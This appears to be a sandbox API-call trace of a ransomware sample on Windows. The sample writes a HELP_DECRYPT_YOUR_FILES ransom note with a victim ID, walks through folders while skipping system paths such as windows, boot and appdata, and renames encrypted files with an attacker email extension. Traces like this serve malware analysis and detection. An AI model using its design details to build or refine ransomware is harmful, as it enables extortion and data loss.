	[0172.561] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0172.562] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.562] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.562] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0172.562] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0172.562] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0172.563] CloseHandle (hObject=0x39c) returned 1
	[0172.563] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8062cce4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName=".", cAlternateFileName="")) returned 0xfb9570
	[0172.564] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*") returned 97
	[0172.564] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.564] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*") returned 0x61
	[0172.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0172.564] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.564] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0172.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0172.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.565] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0172.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0172.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0172.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.566] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0172.566] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0172.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0172.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0172.567] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.567] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.568] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0172.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.568] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0172.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.568] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0172.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.569] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0172.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.569] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0172.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.569] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0172.569] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0172.569] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0172.569] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8062cce4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="..", cAlternateFileName="")) returned 1
	[0172.569] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0172.570] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8060718a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8060718a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8062cce4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0172.570] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8060718a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8060718a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8060718a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0172.570] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1397a49, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1397a49, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13bdcbd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0172.570] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0172.570] FindNextFileW (in: hFindFile=0xfb9570, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0
	[0172.570] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 1
	[0172.570] FindClose (in: hFindFile=0xfb9570 | out: hFindFile=0xfb9570) returned 0
	[0172.571] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8056e330, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8056e330, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8056e330, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0172.571] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8056e330, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8056e330, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8056e330, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x370032, dwReserved1=0x7d0031, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0172.571] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.571] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.580] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.580] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0172.581] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0172.581] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", cAlternateFileName="{3742E~1")) returned 1
	[0172.581] lstrcmpW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="..") returned 1
	[0172.581] lstrcmpW (lpString1="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2=".") returned 1
	[0172.581] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0172.582] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0172.582] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}"
	[0172.582] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}"
	[0172.582] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\"
	[0172.582] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\"
	[0172.582] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*"
	[0172.582] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0172.588] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned 84
	[0172.588] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.588] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*") returned 0x54
	[0172.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.589] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="windows") returned 0x0
	[0172.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.589] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="boot") returned 0x0
	[0172.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.589] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="system volume information") returned 0x0
	[0172.589] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.590] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0172.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.590] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="temp") returned 0x0
	[0172.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.590] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="program files") returned 0x0
	[0172.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.590] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0172.590] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="appdata") returned 0x0
	[0172.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="application data") returned 0x0
	[0172.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="winnt") returned 0x0
	[0172.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.591] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="tmp") returned 0x0
	[0172.591] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="cache") returned 0x0
	[0172.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0172.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="webcache") returned 0x0
	[0172.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.592] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="inetcache") returned 0x0
	[0172.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="nvidia") returned 0x0
	[0172.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="packages") returned 0x0
	[0172.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.593] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="cookies") returned 0x0
	[0172.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.594] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\*.*", lpSrch="programdata") returned 0x0
	[0172.594] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe4b6f3a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0172.594] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2363c60, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa2363c60, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa2389ec8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1988, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0172.594] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0172.594] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0172.594] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\"
	[0172.594] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"
	[0172.594] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned 99
	[0172.594] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.595] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned 0x63
	[0172.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.595] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.595] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"
	[0172.595] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml") returned 99
	[0172.595] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.595] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.596] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.596] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
